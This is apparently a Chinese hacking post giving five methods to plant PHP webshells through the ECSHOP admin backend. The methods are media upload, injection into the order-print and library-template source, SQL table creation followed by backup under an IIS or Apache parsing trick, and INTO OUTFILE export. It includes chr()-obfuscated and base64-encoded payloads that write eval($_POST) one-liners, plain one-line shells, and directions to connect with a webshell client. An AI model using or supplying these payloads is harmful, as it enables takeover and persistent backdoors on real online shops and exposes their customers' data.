*** 一、

进后台-订单管理-订单打印-选择插入/编辑图片，然后弹出一个对话框，选择链接菜单-浏览服务器，左上角上传类型选择media，然后就可以直接上传php小马。文件路径是：/images/upload/Media/xx.php

*** 二、

后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表，随意选择一个订单打印，返回OK，生成一句话成功-在根目录生成了一个null.php，一句话密码：u ***

代码：

<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr
(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr
(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr
(75).chr(33); @fclose($fp); ?>

*** 三、

${${fputs(fopen(base64_decode(cGNzbGkucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbcGNzbGldKT8+))}}

*** 四、

用sql查询然后备份的 *** ，具体是找到数据库管理→SQL查询，然后执行SQL语句

建立新表 （ps:ECSHOP只调用了指定前缀的表 所以表名设为  ecs_cmd）

create table ecs_cmd(cmd text);

在新建立的表中插入一句话

insert into ecs_cmd(cmd) values(‘<php eval($_POST[cmd]);>’);

在数据备份里面→点击自定义备份 可以看到我们新建立的表

选中它后直接备份名改成成x.php;（这是iis解析漏洞，如果是apache可以改成x.php.x.x.x） 就成功备份出来PHP一句话文件了 文件地址：chncto.com/data/sqldata/x.php;x.sql 直接上菜刀连接接即可

另外如果有root权限，也可以接着执行sql语句，导出一个shell

 select cmd from a into outfile ‘网站路径\eval.php’;

找网站路径可以用  use  数据库名;   或者有时也可以用 *** 三来爆出路径

*** 五、

后台–模版管理–库项目管理，选择一个库项目为myship.lbi-配送方式，在代码最下面插入php一句话木马：

<?php eval ($_POST[x]);?>

接着保存，一句话路径是：http://www.chncto.com/myship.php